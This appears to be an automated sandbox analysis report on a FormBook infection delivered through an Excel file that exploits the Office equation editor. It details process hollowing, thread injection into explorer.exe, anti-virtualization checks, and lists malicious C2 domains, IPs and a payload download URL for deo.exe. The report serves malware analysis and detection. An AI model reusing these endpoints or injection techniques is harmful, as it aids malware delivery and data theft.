Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A7313A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_4A7313A9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A737C63 SetUnhandledExceptionFilter, 7_2_4A737C63

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 108.170.14.102 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.dbe648.com
Source: C:\Windows\explorer.exe Domain query: www.lacucinadesign.com
Source: C:\Windows\explorer.exe Network Connect: 45.39.212.162 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.upinmyfeels.com
Source: C:\Windows\explorer.exe Domain query: www.publicationsplace.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ahljsm.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A730000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.502247197.0000000000750000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684820604.0000000000950000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\cmd.exe Code function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetUserObjectInformationW,memmove,GetLocaleInfoW,GetTimeFormatW, 7_2_4A73D701
Source: C:\Windows\SysWOW64\cmd.exe Code function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc, 7_2_4A74270D
Source: C:\Windows\SysWOW64\cmd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 7_2_4A7388D9
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A744E44 GetSystemTime,SystemTimeToFileTime, 7_2_4A744E44
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73D3B3 GetVersion, 7_2_4A73D3B3

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502343 Sample: OCT 13 2021 - PRINT COPY.xlsx Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 39 www.restaurant-utopia.xyz 2->39 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 15 other signatures 2->59 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 33 25 2->16         started        signatures3 process4 dnsIp5 47 18.197.254.181, 49165, 80 AMAZON-02US United States 11->47 33 C:\Users\user\AppData\Local\...\deo[1].exe, PE32 11->33 dropped 35 C:\Users\Public\vbc.exe, PE32 11->35 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->77 18 vbc.exe 1 8 11->18         started        37 C:\Users\...\~$OCT 13 2021 - PRINT COPY.xlsx, data 16->37 dropped file6 signatures7 process8 signatures9 49 Tries to detect virtualization through RDTSC time measurements 18->49 51 Injects a PE file into a foreign processes 18->51 21 vbc.exe 18->21         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 21->61 63 Maps a DLL or memory area into another process 21->63 65 Sample uses process hollowing technique 21->65 67 Queues an APC in another process (thread injection) 21->67 24 explorer.exe 21->24 injected process12 dnsIp13 41 emailforts.com 108.170.14.102, 49167, 80 SSASN2US United States 24->41 43 www.ahljsm.com 45.39.212.162, 49166, 80 EGIHOSTINGUS United States 24->43 45 8 other IPs or domains 24->45 69 System process connects to network (likely due to code injection or exploit) 24->69 28 cmd.exe 24->28         started        signatures14 process15 signatures16 71 Modifies the context of a thread in another process (thread injection) 28->71 73 Maps a DLL or memory area into another process 28->73 75 Tries to detect virtualization through RDTSC time measurements 28->75 31 cmd.exe 28->31         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
108.170.14.102
 emailforts.com United States
20454 SSASN2US true
34.102.136.180
 lacucinadesign.com United States
15169 GOOGLEUS false
18.197.254.181
 unknown United States
16509 AMAZON-02US false
45.39.212.162
 www.ahljsm.com United States
18779 EGIHOSTINGUS true

Private
IP
192.168.2.22
192.168.2.255

Contacted Domains

Name IP Active
www.restaurant-utopia.xyz 172.67.213.229 true
emailforts.com 108.170.14.102 true
lacucinadesign.com 34.102.136.180 true
upinmyfeels.com 34.102.136.180 true
www.ahljsm.com 45.39.212.162 true
www.upinmyfeels.com unknown unknown
www.dbe648.com unknown unknown
www.publicationsplace.com unknown unknown
www.lacucinadesign.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://18.197.254.181/www1/deo.exe true
  • Avira URL Cloud: malware
 unknown
http://www.publicationsplace.com/ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV true
  • Avira URL Cloud: safe
 unknown
www.fis.photos/ef6c/ true
  • Avira URL Cloud: malware
 low
http://www.upinmyfeels.com/ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV false
  • Avira URL Cloud: malware
 unknown
http://www.lacucinadesign.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== false
  • Avira URL Cloud: safe
 unknown
http://www.ahljsm.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== true
  • Avira URL Cloud: safe
 unknown
http://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV true
  • Avira URL Cloud: phishing
 unknown